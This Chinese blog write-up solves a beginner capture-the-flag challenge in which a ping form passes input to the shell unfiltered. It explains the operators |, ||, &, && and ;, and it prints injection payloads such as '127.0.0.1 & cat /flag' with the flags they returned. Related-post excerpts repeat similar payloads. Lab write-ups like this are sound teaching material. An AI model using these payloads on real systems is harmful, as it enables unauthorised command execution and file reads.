【BUUCTF】[ACTF2020 新生赛]Exec Writeup

最新推荐文章于 2025-11-06 21:45:13 发布
原创 最新推荐文章于 2025-11-06 21:45:13 发布 · 1.4k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#ping #漏洞 #安全 #dos #windows

本文介绍了ACTF2020新生赛中Exec0x00挑战的解决方法,利用未过滤的管道符进行命令执行,通过不同的管道操作符如|、||、&、&&、;,成功获取了flag。详细展示了从发现漏洞到获取flag的全过程。

【BUUCTF】[ACTF2020 新生赛]Exec

0x00 知识点

  • 没有过滤,利用常见管道符命令执行
1|(就是按位或),直接执行|后面的语句

2||(就是逻辑或),如果前面命令是错的那么就执行后面的语句,否则只执行前面的语句

3&(就是按位与),&前面和后面命令都要执行,无论前面真假

4&&(就是逻辑与),如果前面为假,后面的命令也不执行,如果前面为真则执行两条命令

5; 前后都执行,无论前面真假,同&,(linux也有)

0x01 解题

127.0.0.1|ls

index.php

  • 从根目录开始找flag,耗时长
127.0.0.1 | find / -name flag

/flag

127.0.0.1 & cat /flag

标记{38aee01b-d1a6-4fcb-93f1-dbf86ef25fd8}
PING 127.0.0.1(127.0.0.1):56个数据字节

|cat /flag

;cat /flag

在这里插入图片描述

标记{f40182a0-6749-43f2-b223-9651bf2ef2d0}

Buuctf-Web-[ACTF2020 新生]Exec 题解&思路总结
m0_62239233的博客
04-22 1573
常见的web漏洞——命令注入
BUUCTF 之 [ACTF2020 新生]Exec(命令执行漏洞
两个月亮
01-08 1438
这界面和这网页标题结合起来,相信给位都能猜到这个靶场中很有可能存在命令执行漏洞。文件往往位于根目录下,但也不要被反套路了。可以看到并没有我们期望的文件。这些文件夹都不需要管它,在。
[ACTF2020 新生] Exec 思路,题解及补充知识点
最新发布
KivenMit的博客
11-06 654
题目:这道题的本质是 Web 应用命令执行漏洞:后台接收用户输入后,直接拼接成系统命令执行,没有做任何过滤第一步:测试漏洞是否存在 输入: 127.0.0.1 && whoami 检测该漏洞是否存在。显示 ping 的正常输出,同时显示一行用户身份第二步:查找 flag 文件位置输入 127.0.0.1 && ls 列出当前目录下的所有文件 / 文件夹发现只有个php文件,flag不在这里。下面查找根目录:127.0.0.1 && ls /我们发现了flag,。第三步:查询具体数据:输入 :127.0
buuctf [ACTF2020 新生]Exec 1
hintll的博客
06-14 5300
[ACTF2020 新生]Exec 1 打开以后是 有个输入窗口有个ping 可能是sql注入,也有可能是命令执行漏洞ping一下本机地址:127.0.0.1 有回显: PING 127.0.0.1 (127.0.0.1): 56 data bytes 那就基本确定是命令执行漏洞: 命令执行有一个参考: https://blog.youkuaiyun.com/hintll/article/details/117790643?spm=1001.2014.3001.5501 直接上手: 先看一下目录: 127.0.0
BUUCTF]ACTF2020 新生Exec1write up
GZWZ_的博客
04-06 1181
ping命令 Linux命令多种解法
BUUCTF[ACTF2020 新生]Exec
stars的博客
11-01 527
文章目录 打开连接发现网站有个ping功能,测试一下 考虑到这里会存在命令执行漏洞,利用它拿到flag 在这里补充一些相关的管道符 1、|(就是按位或),直接执行|后面的语句 2、||(就是逻辑或),如果前面命令是错的那么就执行后面的语句,否则只执行前面的语句 3、&(就是按位与),&前面和后面命令都要执行,无论前面真假 4、&&(就是逻辑与),如果前面为假,后面的命令也不执行,如果前面为真则执行两条命令 5、;(linux下有的,和&一样的作用) 查看根目录发现f
BUUCTF:[ACTF2020 新生]Exec
末初 · mochu7
10-20 527
题目地址:https://buuoj.cn/challenges#[ACTF2020%20%E6%96%B0%E7%94%9F%E8%B5%9B]Exec 命令执行,使用;或者|进行注入 在根目录发现flag,直接读取
BUUCTF[ACTF2020 新生]Exec 1题解
2301_79896143的博客
06-02 849
摘要:本文分析了BUUCTF[ACTF2020 新生]Exec题目,发现存在命令注入漏洞。通过输入127.0.0.1;ls测试命令执行功能后,逐步尝试目录遍历,最终用cat ../../../../../../flag成功获取flag{bda3a63d-74e3-4e9f-8dab-c5c6ea0c1bd9}。该题未对用户输入进行过滤,属于较基础的命令注入漏洞利用。
[ACTF2020 新生]Exec 1-BUUCTF
ZZHow Blog
07-30 1155
本文介绍了命令注入攻击的基本原理及实战演示。通过分析[ACTF2020新生]Exec题目,展示了如何利用命令注入漏洞获取系统权限:首先在Ping功能中注入"127.0.0.1 ; ls"命令查看目录,然后使用"cd ../../../ ; ls"遍历目录寻找flag文件,最后通过多种命令(cat/nl/more等)读取flag内容。 写于2023/11/15
BUUCTF[ACTF2020 新生]Include 1题解
2301_79896143的博客
06-02 1502
这篇文章分析了BUUCTF[ACTF2020 新生]Include 1题目的解题过程。题目通过URL参数暴露了文件包含漏洞,利用php://filter伪协议读取flag.php的base64编码内容,成功获取被注释的flag。解题关键点包括:发现文件包含漏洞、理解PHP伪协议过滤器、构造payload将文件内容base64编码以避免执行。文章详细介绍了php://filter的各种过滤器参数和功能,并提供了完整的解题思路和payload构造方法,适合CTF初学者学习文件包含漏洞利用技巧。最终通过解码获得
buuctf [ACTF2020 新生]Exec
SopRomeo的博客
02-28 1784
有点意思,ping ip 刚开始还以为是sql注入,想多了,直接命令执行,没有任何过滤! playload: 127.0.0.1;cat /flag ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200228205143468.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shad...
BUUCTF————[ACTF2020 新生]Exec
qq_61579604的博客
11-02 310
只有一个index.php文件那么查看上级目录文件127.0.0.1|ls /使用命令127.0.0.1|ls查看此文件的目录。
BUUCTF [ACTF2020 新生] Exec
Senimo
10-18 1100
BUUCTF [ACTF2020 新生] Exec 启动靶机,打开环境: 页面可以执行Ping命令,判断应为命令执行漏洞 尝试输入正常IP127.0.0.1查看其回显: 127.0.0.1 其为正常回显,测试管道连接符|是否能用: 127.0.0.1 | ls 管道连接符|可以正常使用,并且ls命令可以正常执行 查看根目录: 127.0.0.1 | ls / 发现flag文件,使用cat命令查看: 127.0.0.1 | cat /flag 得到flag 基础的通过管道连接符|就可以的命
BUUCTF刷题记录】[ACTF2020新生]Exec
m0_60911102的博客
09-01 1481
BUUCTF刷题之命令执行---exec
BUUCTF [ACTF2020 新生]Exec
m0_49025459的博客
04-18 2000
题目 输入127.0.0.1|ls /看根目录 | 输入127.0.0.1|cat /flag看flag 这道题就是利用管道符来做 可以直接在ping输入框中输入1;cat /fag;也可以 1|cat /flag 1&cat /flag 当然如果使用 ||必须需要前面是一个假的,就是前面条件为假才执行后面的否则只执行前面的 所以可以用 a||cat /flag 以上方法都可以得到结果 1、|(就是按位或),直接执行|后面的语句 2、||(就是逻辑或).
buuctf web题[ACTF2020 新生]Exec
qq_44740774的博客
09-25 420
buuctf web的[ACTF2020 新生]Exec
buuctf [ACTF2020 新生]Include 1
02-26
### BUUCTF ACTF2020 新生 Include 1 解题报告 #### 题目背景与目标 BUUCTF中的ACTF2020新生题目Include 1涉及到了PHP文件包含漏洞的利用。通过分析给定的信息,可以推测出该题目旨在考察参者对于PHP文件包含...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值